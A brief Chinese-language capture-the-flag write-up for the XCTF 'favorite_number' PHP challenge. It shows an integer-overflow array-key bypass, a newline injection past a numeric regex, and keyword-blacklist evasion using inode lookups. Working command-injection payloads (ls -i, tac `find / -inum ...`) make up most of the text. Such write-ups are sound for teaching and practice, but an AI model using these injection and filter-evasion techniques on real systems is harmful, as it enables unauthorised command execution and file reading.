XCTF-favorite_number
题目 (xctf.org.cn)
- 判断,既要数组强等于,又要首元素不等;php有下标越界溢出漏洞,因此0可以通过整型溢出得到 绕过if判断
playload:stuff[4294967296]=admin&stuff[1]=user&num=123456 - 然后是个正则,要求整个字符串都是数字,大小写不敏感,跨行检测
playload:stuff[4294967296]=admin&stuff[1]=user&num=123%0als - 最后是个黑名单,排除了cat、flag等词
inode索引结点
因为黑名单的存在,查找flag索引节点来找到flag,
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i / 显示所有文件加索引。
显示flag
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 1573238` 2的32次方为4294967296
